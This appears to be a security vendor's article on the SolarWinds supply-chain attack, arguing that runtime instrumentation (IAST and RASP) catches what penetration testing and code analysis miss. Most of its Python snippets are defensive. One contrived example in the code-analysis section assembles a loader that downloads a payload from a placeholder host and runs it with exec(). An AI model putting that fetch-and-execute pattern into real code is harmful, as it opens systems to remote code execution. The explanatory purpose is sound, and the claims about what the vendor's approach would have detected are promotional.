As more news emerges about the SolarWinds cyberattack, its severity and reach continue to grow. Many now herald it as the “hack of the decade.” It gave the perpetrators what amounts to “god access,” allegedly to more than 18,000 organizations. While the attack unfolded in the context of the software supply chain, it was indisputably a software hack. Malicious actors get inside networks through various doors, and applications are the top entry point. CEOs, CIOs, CTOs, and CISOs must put software security at the top of their 2021 priorities.
In response to the SolarWinds hack, politicians and other officials are calling for stricter software security policies and controls. A recent article in Politico reviews the recommendations and arguments being made. Bryan Ware, former assistant director for cybersecurity at the Cybersecurity and Infrastructure Security Agency (CISA), notes that “security is not a significant consideration or even well understood. Plenty of sophisticated CIOs bought and deployed SolarWinds’ software.” Representative Jim Langevin (D-R.I.), co-founder of the Congressional Cybersecurity Caucus, adds that “Congress needs to incentivize software companies to make their software more secure, which could require expensive changes.”
Software Acceleration Creates Business Risk
There are a number of reasons behind the increased risk that software poses, with pressure to write more code and release it faster at the top of the list. One might assume that the push for speed would have diminished as more organizations adopted Agile and DevOps approaches. But that isn’t the case. Contrast Security recently found in its State of DevSecOps Report that 79% of organizations are under greater pressure to accelerate their development cycles. One outcome is that developers skip security processes when releasing code: 55% say they often or sometimes do so to meet release cycle deadlines.
During the days of waterfall development, application security consisted of running penetration tests before releasing code. The adoption of Agile and DevOps has since prompted application security to shift left, so that vulnerabilities can be fixed during development. Legacy application security approaches struggle to provide the comprehensive, continuous observability needed to minimize risk while still letting development scale, both in the quantity of code written and in the frequency of releases.
In the case of the SolarWinds hack, attackers broke into the company and changed application code. This is evident because the binary that reaches out to download a command-and-control (C&C) payload is cryptographically signed with a SolarWinds key: the integrity of the software development process itself was compromised. SolarWinds’ customers are now at risk not simply because of the open backdoor but because the vendor’s internal software processes and controls were not locked down as they should have been.
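One practical takeaway for software consumers is how little a passing integrity check proves on its own. The minimal Python sketch below (file name and digest are hypothetical) verifies a downloaded artifact against a vendor-published SHA-256 digest:

```python
import hashlib

def sha256_of(path: str) -> str:
    """Compute the SHA-256 digest of a file, reading in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

# Hypothetical values for illustration only.
DOWNLOADED_INSTALLER = "orion-update.msi"
VENDOR_PUBLISHED_DIGEST = "3f2a..."  # as listed on the vendor's download page

if sha256_of(DOWNLOADED_INSTALLER) == VENDOR_PUBLISHED_DIGEST:
    print("Digest matches the vendor's published value.")
else:
    print("Digest mismatch: do not install.")
```

In the SolarWinds case this check would have passed, because the malicious code was inserted before the vendor built and signed the release. Signatures and digests authenticate the publisher, not the behavior of the code.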
The reality today is that the network perimeter—internal or external—no longer exists. Organizations must secure and protect all software, regardless of where it runs: in the public cloud, in a private cloud, in internal applications, in Software-as-a-Service (SaaS) applications, or in customer-facing web applications. Software vulnerabilities can and will be exploited. Indeed, in the aforementioned State of DevSecOps Report, 95% of organizations reported at least one successful application exploitation in the past year, most of them in vulnerable applications or open-source libraries with known exploits.
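Because most successful exploits target applications or open-source libraries with known vulnerabilities, one inexpensive control is checking dependencies against a public vulnerability database. Below is a minimal sketch using the public OSV.dev query API; the package name and version are illustrative only.

```python
import json
import urllib.request

def known_vulns(name: str, version: str, ecosystem: str = "PyPI") -> list:
    """Query the public OSV.dev database for known vulnerabilities
    affecting a specific package version."""
    payload = json.dumps({
        "package": {"name": name, "ecosystem": ecosystem},
        "version": version,
    }).encode()
    req = urllib.request.Request(
        "https://api.osv.dev/v1/query",
        data=payload,
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp).get("vulns", [])

# Example: a deliberately old library version (illustrative).
for vuln in known_vulns("django", "2.2.0"):
    print(vuln["id"], vuln.get("summary", ""))
```

Running a check like this on every build catches the known-exploit case, though, as the SolarWinds hack shows, it does nothing against a compromised supply chain.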
Examining the Failings of Legacy Application Security
Many legacy techniques involve “strobe-light style security”: point-in-time snapshots that make it impossible to ever really understand the security posture of an application. In the case of the SolarWinds hack, attackers breached the upstream vendor, attacked the update mechanism, and then waited for agencies to apply the update, which they did in the name of security. Many existing security controls would not have caught the issue anyway, simply because they either cannot run in time or look at the wrong thing.
Penetration Testing as a Potential Means of Security
Penetration testing was an ineffective control here because the attack did not exploit any vulnerabilities in the application. Even a fully comprehensive review would have found nothing, since the attack did not rely on penetrating the software at all. While someone might conceivably have spotted the attempt to download remote payloads by examining the application’s binary in a reverse engineering/decompilation tool like Ghidra, that work is well outside the scope of penetration testing. By attacking the update mechanism, the attackers made it extremely unlikely that even the most astute, most dedicated penetration tester could detect that anything was wrong. Further, the breach occurred elsewhere in SolarWinds, with the attackers modifying the application itself.
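For illustration, the kind of quick triage a reverse engineer might begin with, scanning a binary for plain-text URL-like byte sequences, takes only a few lines of Python (the file name below is hypothetical):

```python
import re

# Matches printable ASCII sequences that look like embedded URLs.
URL_PATTERN = re.compile(rb"https?://[\x21-\x7e]{4,}")

def find_embedded_urls(path: str) -> list[bytes]:
    """Scan a binary for plain-text URL-like byte sequences,
    the kind of quick triage a reverse engineer might start with."""
    with open(path, "rb") as f:
        data = f.read()
    return URL_PATTERN.findall(data)

for url in find_embedded_urls("SolarWinds.Orion.Core.BusinessLayer.dll"):
    print(url.decode(errors="replace"))
```

Notably, the actual implant reportedly obfuscated its strings, so even this check would likely have come up empty, which underscores how far such detection sits outside a penetration test.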
It also makes neither financial nor logistical sense for buyers to analyze vendor software with anything close to the rigor expected of (and often not applied by) the vendor itself. Penetration testing is most often done by the software creator or the organization that funded development. For custom software, one group creates the software (developers) and another (application security) evaluates its security before release. Because security is a nonfunctional requirement, it does not make sense for each buyer to fund a detailed manual review just to find issues for the vendor.
Code Analysis as Another Means of Security
Another application security technique is code analysis, whether of source or binary; it requires access to the code or the assembled application. While code analysis shifts application security left in development, it too would have failed to detect the SolarWinds hack. Applied to the SolarWinds distribution, code analysis would have evaluated two separate components: the application and the update. The SolarWinds Orion application was not itself vulnerable, so analyzing it would have revealed no issues. The update, meanwhile, altered portions of the underlying application that were not part of the update itself. As a result, even the best code analyzer would have had no way to see that something was wrong.
Looking at the code or binary in isolation is thus a common yet ineffective technique. National Institute of Standards and Technology (NIST) 800-53 control SA-11(1) discusses code analysis as an effective control, and while the advice is sound, it only works when the organization has all of the code together at the same time. To circumvent this control, attackers split code into separate bundles to mask its intent.
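To make the splitting tactic concrete, consider the contrived, single-file Python sketch below (all names invented). In a real attack the pieces would live in separately reviewed components; an analyzer looking at any one “bundle” in isolation sees only benign configuration or a generic utility.

```python
import urllib.request

# "Bundle" 1: configuration data. Reviewed alone, nothing here executes.
SETTINGS = {"handler": "fetch_remote", "endpoint": "https://example.invalid/payload"}

# "Bundle" 2: a generic HTTP helper. Reviewed alone, it is an ordinary utility.
def fetch_remote(url: str) -> bytes:
    with urllib.request.urlopen(url) as resp:
        return resp.read()

# Loader: only when the bundles are composed at runtime does the behavior
# become "fetch and execute remote code." No single bundle contains this path.
if __name__ == "__main__":
    handler = globals()[SETTINGS["handler"]]
    try:
        payload = handler(SETTINGS["endpoint"])  # placeholder; will not resolve
        exec(payload)
    except OSError:
        pass
```

The end-to-end malicious path only materializes when the pieces meet in a running process, which is exactly where static, per-bundle review stops looking.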
A related example comes from the UK’s oversight of Huawei, in which an oversight board monitored Huawei networking equipment for backdoors enabling malicious infiltration or data exfiltration. Even though the board spent eight years performing code analysis on Huawei’s software, it only once verified that the code it reviewed actually matched the code running on the device. Code analysis of the SolarWinds payloads would have been similarly ineffective. Even a reviewer with the original code and the update in hand would have missed the attack, because the update worked by swapping functions in the Windows registry and obtaining remote code, changes visible only within running software.
Applying the Latest Updates to the NIST 800-53 Security Controls
One answer to the problem is the adoption and enforcement of security standards. Today, government agencies typically evaluate software security through two key lenses: NIST Special Publication 800-53, which specifies security and privacy controls including application security standards, and various Security Technical Implementation Guides (STIGs), which spell out where and how to implement those controls.
The security industry made a major advance in application verification in 2020, when NIST 800-53 revision 5 introduced new ways to evaluate the security of an application. The newly added techniques enable organizations to evaluate software using interactive application security testing (IAST), whether or not they have the code, turning all usage of the application into a continuous security test.
From all indications, the SolarWinds code was hijacked in its own build environment and cryptographically signed with SolarWinds’ signing key. The injected code then downloaded a C&C module, meaning the exploit could only have been detected while the software was running. Thus, prior to the publication of NIST 800-53 revision 5, adherence to the NIST security standards would not have prevented the SolarWinds hack. However, employing IAST, which uses instrumentation to embed security analysis in running software during development, together with runtime application self-protection (RASP) in production, would have detected the exploit.
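As a rough illustration of the principle (not of any particular product), the Python sketch below instruments the standard library’s HTTP opener so that every outbound request the running application makes is checked against an allowlist at runtime. The allowlist hosts are hypothetical; the point is that runtime instrumentation observes behavior rather than code.

```python
import urllib.request
from urllib.parse import urlparse

# Hypothetical allowlist: the hosts this application is expected to contact.
ALLOWED_HOSTS = {"api.internal.example.com", "updates.example.com"}

_original_urlopen = urllib.request.urlopen

def guarded_urlopen(url, *args, **kwargs):
    """Instrumented replacement for urlopen: observes every outbound request
    the running application makes and blocks unexpected hosts."""
    target = url if isinstance(url, str) else url.full_url
    host = urlparse(target).hostname
    if host not in ALLOWED_HOSTS:
        # A real RASP agent would also report telemetry to a monitoring system.
        raise PermissionError(f"blocked unexpected outbound request to {host!r}")
    return _original_urlopen(url, *args, **kwargs)

# Install the instrumentation process-wide; from this point on, a hidden
# attempt to download a C&C payload surfaces as a blocked, observable event.
urllib.request.urlopen = guarded_urlopen
```

This is the vantage point from which an unexpected C&C download becomes visible: not in the source, not in the update package, but in what the running process actually does.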
Security Instrumentation for Continuous, Accurate Application Security
For organizations that host third-party applications in their data centers or private clouds, the same continuous monitoring capabilities apply: IAST in development and RASP in production. Here, the maxim “never trust, always verify” is apropos. With tens of thousands of organizations running SaaS-based and on-premises applications in their own data centers and private clouds, there is a significant opportunity to ratchet up their security and risk protections.
For more information on security instrumentation and how it provides continuous, accurate vulnerability analysis and detection, listen to the Inside AppSec Podcast interview with Contrast Security’s CTO and Co-Founder Jeff Williams (“Reexamining Application Security Post-SolarWinds Hack”).